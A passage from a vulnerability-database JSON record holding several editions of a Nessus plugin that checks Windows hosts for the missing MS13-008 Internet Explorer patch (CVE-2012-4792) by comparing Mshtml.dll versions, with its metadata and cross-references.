Windows 7 / 2008 R2\n #\n # - Internet Explorer 8\n hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"Mshtml.dll\", version:\"8.0.7601.22185\", min_version:\"8.0.7601.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"Mshtml.dll\", version:\"8.0.7601.18021\", min_version:\"8.0.7601.17000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.1\", sp:0, file:\"Mshtml.dll\", version:\"8.0.7600.21393\", min_version:\"8.0.7600.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.1\", sp:0, file:\"Mshtml.dll\", version:\"8.0.7600.17185\", min_version:\"8.0.7600.16000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n\n # Vista / 2008\n #\n # - Internet Explorer 8\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Mshtml.dll\", version:\"8.0.6001.23462\", min_version:\"8.0.6001.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Mshtml.dll\", version:\"8.0.6001.19394\", min_version:\"8.0.6001.18000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 7\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Mshtml.dll\", version:\"7.0.6002.22995\", min_version:\"7.0.6002.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Mshtml.dll\", version:\"7.0.6002.18747\", min_version:\"7.0.6002.18000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n\n # Windows 2003 / XP 64-bit\n #\n # - Internet Explorer 8\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"Mshtml.dll\", version:\"8.0.6001.23462\", min_version:\"8.0.6001.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"Mshtml.dll\", version:\"8.0.6001.19394\", min_version:\"8.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 7\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"Mshtml.dll\", version:\"7.0.6000.21319\", min_version:\"7.0.6000.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"Mshtml.dll\", version:\"7.0.6000.17117\", min_version:\"7.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 6\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"Mshtml.dll\", version:\"6.0.3790.5098\", min_version:\"6.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n\n # Windows XP x86\n #\n # - Internet Explorer 8\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"Mshtml.dll\", version:\"8.0.6001.23462\", min_version:\"8.0.6001.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"Mshtml.dll\", version:\"8.0.6001.19394\", min_version:\"8.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 7\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"Mshtml.dll\", version:\"7.0.6000.21319\", min_version:\"7.0.6000.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"Mshtml.dll\", version:\"7.0.6000.17117\", min_version:\"7.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 6\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"Mshtml.dll\", version:\"6.0.2900.6325\", min_version:\"6.0.2900.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb)\n)\n{\n set_kb_item(name:\"SMB/Missing/\"+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 'affected');\n}\n", "title": "MS13-008: Security Update for Internet Explorer (2799329)", "type": "nessus", "viewCount": 6}, "differentElements": ["modified", "sourceData"], "edition": 4, "lastseen": "2017-10-29T13:35:56"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:ie"], "cvelist": ["CVE-2012-4792"], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "The remote host is missing Internet Explorer (IE) Security Update\n2799329.\n\nThe installed version of IE is affected by a vulnerability that could\nallow an attacker to execute arbitrary code on the remote host.", "edition": 11, "enchantments": {"dependencies": {"modified": "2019-01-16T20:15:18", "references": [{"idList": ["CVE-2012-4792"], "type": "cve"}, {"idList": ["THN:5ACF233F4E37E6A4975B246F2082107C", "THN:7ACF921BA3C582C8760C348FD2475BC2"], "type": "thn"}, {"idList": ["SMB_KB2794220.NASL"], "type": "nessus"}, {"idList": ["EDB-ID:23754", "EDB-ID:23785"], "type": "exploitdb"}, {"idList": ["OPENVAS:1361412562310902699", "OPENVAS:902699"], "type": "openvas"}, {"idList": ["SMNTC-57070"], "type": "symantec"}, {"idList": ["THREATPOST:D28B11CA5BD698B7DBA755347444B7A2", "THREATPOST:B4DB3D0667E712349DDF7EF229F2D543", "THREATPOST:39F4459D592F1F044F7A11772E4B8ACE", "THREATPOST:37FD3A8A338F59D00D9F7966AFF5067F", "THREATPOST:5881049DF0819D9F1F2AEFE35F853C68", "THREATPOST:E22638A2E1CC5775D0EA1AF91EFFF450"], "type": "threatpost"}, {"idList": ["SECURITYVULNS:VULN:12835"], "type": "securityvulns"}, {"idList": ["MSF:EXPLOIT/WINDOWS/BROWSER/IE_CBUTTON_UAF"], "type": "metasploit"}, {"idList": ["1337DAY-ID-20069"], "type": "zdt"}, {"idList": ["SSV:60551"], "type": "seebug"}, {"idList": ["PACKETSTORM:119168", "PACKETSTORM:119186"], "type": "packetstorm"}, {"idList": ["VU:154201"], "type": "cert"}, {"idList": ["SAINT:E4225C669F34358E2FC7EE71D604FA0A", "SAINT:DCB95B394157102378C2A8CADFE280E8", "SAINT:2EF245955FDA0606FF9A743D9132C6A8"], "type": "saint"}]}, "score": {"value": 7.5, "vector": "NONE"}}, "hash": "e552b3ba48a2f156c16fa619b4243077722ad304c072a76a9fc6846aca5d2ede", "hashmap": [{"hash": "ed4584402ef3628bb7394dce3e4ce55d", "key": "published"}, {"hash": "6f08f84e3b368ff5e99adc78c0a77eab", "key": "references"}, {"hash": "254e47b75e3e4b92eddce6ae2e9b47a4", "key": "cpe"}, {"hash": "2076413bdcb42307d016f5286cbae795", "key": "cvss"}, {"hash": "538d0d1c332ac3dd3e1d9aa41bec0d37", "key": "description"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "e0495b755cbd4bc646c8cd4fa1af24d6", "key": "title"}, {"hash": "015cb78ce50d3bd4e2fbe18f25603329", "key": "modified"}, {"hash": "9eac560d661140becf2386e61f0c3aa7", "key": "pluginID"}, {"hash": "432dbc91e05813e6c7c38e4258d2b638", "key": "cvelist"}, {"hash": "c9898bc973bfffca5119f1a3bfa73a8d", "key": "naslFamily"}, {"hash": "a6f5bf31886c073e4af45af7488e4877", "key": "href"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "61dcfa1ba98bb298fd5d06d3d95c176e", "key": "sourceData"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=63522", "id": "SMB_NT_MS13-008.NASL", "lastseen": "2019-01-16T20:15:18", "modified": "2018-11-15T00:00:00", "naslFamily": "Windows : Microsoft Bulletins", "objectVersion": "1.3", "pluginID": "63522", "published": "2013-01-14T00:00:00", "references": ["https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2013/ms13-008"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(63522);\n script_version(\"1.16\");\n script_cvs_date(\"Date: 2018/11/15 20:50:31\");\n\n script_cve_id(\"CVE-2012-4792\");\n script_bugtraq_id(57070);\n script_xref(name:\"CERT\", value:\"154201\");\n script_xref(name:\"EDB-ID\", value:\"23754\");\n script_xref(name:\"MSFT\", value:\"MS13-008\");\n script_xref(name:\"MSKB\", value:\"2799329\");\n\n script_name(english:\"MS13-008: Security Update for Internet Explorer (2799329)\");\n script_summary(english:\"Checks version of Mshtml.dll\");\n\n script_set_attribute(attribute:\"synopsis\", value:\"The remote host is affected by a code execution vulnerability.\");\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The remote host is missing Internet Explorer (IE) Security Update\n2799329.\n\nThe installed version of IE is affected by a vulnerability that could\nallow an attacker to execute arbitrary code on the remote host.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2013/ms13-008\");\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Microsoft has released a set of patches for XP, 2003, Vista, 2008, 7,\n2008 R2.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MS13-008 Microsoft Internet Explorer CButton Object Use-After-Free Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\nscript_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/12/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/01/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:ie\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS13-008';\nkb = '2799329';\n\nkbs = make_list(kb);\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(xp:'3', win2003:'2', vista:'2', win7:'0,1') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\nif (hotfix_check_server_core() == 1) audit(AUDIT_WIN_SERVER_CORE);\n\nrootfile = hotfix_get_systemroot();\nif (!rootfile) exit(1, \"Failed to get the system root.\");\n\nshare = ereg_replace(pattern:\"^([A-Za-z]):.*\", replace:\"\\1$\", string:rootfile);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\n\nif (\n # Windows 7 / 2008 R2\n #\n # - Internet Explorer 8\n hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"Mshtml.dll\", version:\"8.0.7601.22185\", min_version:\"8.0.7601.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"Mshtml.dll\", version:\"8.0.7601.18021\", min_version:\"8.0.7601.17000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.1\", sp:0, file:\"Mshtml.dll\", version:\"8.0.7600.21393\", min_version:\"8.0.7600.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.1\", sp:0, file:\"Mshtml.dll\", version:\"8.0.7600.17185\", min_version:\"8.0.7600.16000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n\n # Vista / 2008\n #\n # - Internet Explorer 8\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Mshtml.dll\", version:\"8.0.6001.23462\", min_version:\"8.0.6001.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Mshtml.dll\", version:\"8.0.6001.19394\", min_version:\"8.0.6001.18000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 7\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Mshtml.dll\", version:\"7.0.6002.22995\", min_version:\"7.0.6002.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Mshtml.dll\", version:\"7.0.6002.18747\", min_version:\"7.0.6002.18000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n\n # Windows 2003 / XP 64-bit\n #\n # - Internet Explorer 8\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"Mshtml.dll\", version:\"8.0.6001.23462\", min_version:\"8.0.6001.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"Mshtml.dll\", version:\"8.0.6001.19394\", min_version:\"8.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 7\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"Mshtml.dll\", version:\"7.0.6000.21319\", min_version:\"7.0.6000.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"Mshtml.dll\", version:\"7.0.6000.17117\", min_version:\"7.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 6\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"Mshtml.dll\", version:\"6.0.3790.5098\", min_version:\"6.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n\n # Windows XP x86\n #\n # - Internet Explorer 8\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"Mshtml.dll\", version:\"8.0.6001.23462\", min_version:\"8.0.6001.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"Mshtml.dll\", version:\"8.0.6001.19394\", min_version:\"8.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 7\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"Mshtml.dll\", version:\"7.0.6000.21319\", min_version:\"7.0.6000.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"Mshtml.dll\", version:\"7.0.6000.17117\", min_version:\"7.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 6\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"Mshtml.dll\", version:\"6.0.2900.6325\", min_version:\"6.0.2900.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb)\n)\n{\n set_kb_item(name:\"SMB/Missing/\"+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 'affected');\n}\n", "title": "MS13-008: Security Update for Internet Explorer (2799329)", "type": "nessus", "viewCount": 7}, "differentElements": ["description"], "edition": 11, "lastseen": "2019-01-16T20:15:18"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:ie"], "cvelist": ["CVE-2012-4792"], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "The remote host is missing Internet Explorer (IE) Security Update 2799329.\n\nThe installed version of IE is affected by a vulnerability that could allow an attacker to execute arbitrary code on the remote host.", "edition": 6, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "58899474e5144f974823d0bbe5843c8b0697c2a8faf48e4684a76fba7a51ebca", "hashmap": [{"hash": "ed4584402ef3628bb7394dce3e4ce55d", "key": "published"}, {"hash": "254e47b75e3e4b92eddce6ae2e9b47a4", "key": "cpe"}, {"hash": "2076413bdcb42307d016f5286cbae795", "key": "cvss"}, {"hash": "3b33040e1ee70c0673ab567f99a67d3f", "key": "modified"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "e0495b755cbd4bc646c8cd4fa1af24d6", "key": "title"}, {"hash": "9eac560d661140becf2386e61f0c3aa7", "key": "pluginID"}, {"hash": "432dbc91e05813e6c7c38e4258d2b638", "key": "cvelist"}, {"hash": "c9898bc973bfffca5119f1a3bfa73a8d", "key": "naslFamily"}, {"hash": "a6f5bf31886c073e4af45af7488e4877", "key": "href"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "f780f8e2047beaa3cea3360afdd2e9b3", "key": "sourceData"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "1f6b7bf156020139cfba6367866dc123", "key": "references"}, {"hash": "853e90e76cb8bc44659046710a5f8a59", "key": "description"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=63522", "id": "SMB_NT_MS13-008.NASL", "lastseen": "2018-07-31T09:45:12", "modified": "2018-07-30T00:00:00", "naslFamily": "Windows : Microsoft Bulletins", "objectVersion": "1.3", "pluginID": "63522", "published": "2013-01-14T00:00:00", "references": ["https://technet.microsoft.com/library/security/ms13-008"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(63522);\n script_version(\"1.14\");\n script_cvs_date(\"Date: 2018/07/30 15:31:33\");\n\n script_cve_id(\"CVE-2012-4792\");\n script_bugtraq_id(57070);\n script_xref(name:\"CERT\", value:\"154201\");\n script_xref(name:\"EDB-ID\", value:\"23754\", \"23785\");\n script_xref(name:\"MSFT\", value:\"MS13-008\");\n script_xref(name:\"MSKB\", value:\"2799329\");\n\n script_name(english:\"MS13-008: Security Update for Internet Explorer (2799329)\");\n script_summary(english:\"Checks version of Mshtml.dll\");\n\n script_set_attribute(attribute:\"synopsis\", value:\"The remote host is affected by a code execution vulnerability.\");\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The remote host is missing Internet Explorer (IE) Security Update\n2799329.\n\nThe installed version of IE is affected by a vulnerability that could\nallow an attacker to execute arbitrary code on the remote host.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"https://technet.microsoft.com/library/security/ms13-008\");\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Microsoft has released a set of patches for XP, 2003, Vista, 2008, 7,\n2008 R2.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MS13-008 Microsoft Internet Explorer CButton Object Use-After-Free Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\nscript_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/12/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/01/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:ie\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS13-008';\nkb = '2799329';\n\nkbs = make_list(kb);\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(xp:'3', win2003:'2', vista:'2', win7:'0,1') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\nif (hotfix_check_server_core() == 1) audit(AUDIT_WIN_SERVER_CORE);\n\nrootfile = hotfix_get_systemroot();\nif (!rootfile) exit(1, \"Failed to get the system root.\");\n\nshare = ereg_replace(pattern:\"^([A-Za-z]):.*\", replace:\"\\1$\", string:rootfile);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\n\nif (\n # Windows 7 / 2008 R2\n #\n # - Internet Explorer 8\n hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"Mshtml.dll\", version:\"8.0.7601.22185\", min_version:\"8.0.7601.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"Mshtml.dll\", version:\"8.0.7601.18021\", min_version:\"8.0.7601.17000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.1\", sp:0, file:\"Mshtml.dll\", version:\"8.0.7600.21393\", min_version:\"8.0.7600.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.1\", sp:0, file:\"Mshtml.dll\", version:\"8.0.7600.17185\", min_version:\"8.0.7600.16000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n\n # Vista / 2008\n #\n # - Internet Explorer 8\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Mshtml.dll\", version:\"8.0.6001.23462\", min_version:\"8.0.6001.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Mshtml.dll\", version:\"8.0.6001.19394\", min_version:\"8.0.6001.18000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 7\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Mshtml.dll\", version:\"7.0.6002.22995\", min_version:\"7.0.6002.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Mshtml.dll\", version:\"7.0.6002.18747\", min_version:\"7.0.6002.18000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n\n # Windows 2003 / XP 64-bit\n #\n # - Internet Explorer 8\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"Mshtml.dll\", version:\"8.0.6001.23462\", min_version:\"8.0.6001.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"Mshtml.dll\", version:\"8.0.6001.19394\", min_version:\"8.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 7\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"Mshtml.dll\", version:\"7.0.6000.21319\", min_version:\"7.0.6000.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"Mshtml.dll\", version:\"7.0.6000.17117\", min_version:\"7.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 6\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"Mshtml.dll\", version:\"6.0.3790.5098\", min_version:\"6.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n\n # Windows XP x86\n #\n # - Internet Explorer 8\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"Mshtml.dll\", version:\"8.0.6001.23462\", min_version:\"8.0.6001.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"Mshtml.dll\", version:\"8.0.6001.19394\", min_version:\"8.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 7\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"Mshtml.dll\", version:\"7.0.6000.21319\", min_version:\"7.0.6000.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"Mshtml.dll\", version:\"7.0.6000.17117\", min_version:\"7.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 6\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"Mshtml.dll\", version:\"6.0.2900.6325\", min_version:\"6.0.2900.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb)\n)\n{\n set_kb_item(name:\"SMB/Missing/\"+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 'affected');\n}\n", "title": "MS13-008: Security Update for Internet Explorer (2799329)", "type": "nessus", "viewCount": 7}, "differentElements": ["cvss"], "edition": 6, "lastseen": "2018-07-31T09:45:12"}], "edition": 14, "hashmap": [{"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "cpe", "hash": "254e47b75e3e4b92eddce6ae2e9b47a4"}, {"key": "cvelist", "hash": "432dbc91e05813e6c7c38e4258d2b638"}, {"key": "cvss", "hash": "d726e774add6189e33cf2ea0c61a2ba5"}, {"key": "description", "hash": "538d0d1c332ac3dd3e1d9aa41bec0d37"}, {"key": "href", "hash": "e8ec5d02e016cac43a330cd6a189f48c"}, {"key": "modified", "hash": "abcf9266f425f12dda38f529cd4a94bc"}, {"key": "naslFamily", "hash": "c9898bc973bfffca5119f1a3bfa73a8d"}, {"key": "pluginID", "hash": "9eac560d661140becf2386e61f0c3aa7"}, {"key": "published", "hash": "ed4584402ef3628bb7394dce3e4ce55d"}, {"key": "references", "hash": "6f08f84e3b368ff5e99adc78c0a77eab"}, {"key": "reporter", "hash": "528cea5b87bf77107bd9f05291bbffe5"}, {"key": "sourceData", "hash": "61dcfa1ba98bb298fd5d06d3d95c176e"}, {"key": "title", "hash": "e0495b755cbd4bc646c8cd4fa1af24d6"}, {"key": "type", "hash": "5e0bd03bec244039678f2b955a2595aa"}], "hash": "475714938bd49be47e4a2b5da616cd4de03a84fb5d96abcc6016882bc4631866", "viewCount": 11, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2012-4792"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:119168", "PACKETSTORM:119186"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310902699", "OPENVAS:902699"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:12835"]}, {"type": "seebug", "idList": ["SSV:60551"]}, {"type": "threatpost", "idList": ["THREATPOST:39F4459D592F1F044F7A11772E4B8ACE", "THREATPOST:37FD3A8A338F59D00D9F7966AFF5067F", "THREATPOST:E22638A2E1CC5775D0EA1AF91EFFF450", "THREATPOST:5881049DF0819D9F1F2AEFE35F853C68", "THREATPOST:D28B11CA5BD698B7DBA755347444B7A2", "THREATPOST:B4DB3D0667E712349DDF7EF229F2D543"]}, {"type": "symantec", "idList": ["SMNTC-57070"]}, {"type": "nessus", "idList": ["SMB_KB2794220.NASL"]}, {"type": "saint", "idList": ["SAINT:2EF245955FDA0606FF9A743D9132C6A8", "SAINT:E4225C669F34358E2FC7EE71D604FA0A", "SAINT:DCB95B394157102378C2A8CADFE280E8"]}, {"type": "exploitdb", "idList": ["EDB-ID:23785", "EDB-ID:23754"]}, 